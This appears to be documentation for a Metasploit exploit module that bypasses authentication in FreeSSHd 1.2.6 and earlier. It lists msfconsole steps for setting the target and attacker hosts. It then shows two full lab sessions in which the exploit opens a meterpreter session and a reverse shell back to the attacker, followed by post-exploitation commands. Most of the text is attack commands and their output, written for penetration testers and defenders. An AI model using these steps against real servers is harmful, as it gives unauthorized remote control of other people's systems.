## Description

This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.


## Verification

  1. Start msfconsole
  2. Do : `use exploit/windows/ssh/freesshd_authbypass`
  3. Do : `set RHOST [target IP]`
  4. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default)
  5. Do : `set LHOST [Your IP]`
  6. Do : `set LPORT [valid port]` (port is `4444` by default)
  7. Do : `exploit`
  8. If target is vulnerable, a shell (`meterpreter` by default) should pop

## Example with default payload (windows/meterpreter/reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800

meterpreter > sysinfo
Computer        : SSH-TEST-SERVER
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

```

## Example with plain old reverse shell (windows/shell_reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800



C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
   IPv4 Address. . . . . . . . . . . : 192.168.80.131
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER

C:\Windows\system32>
```
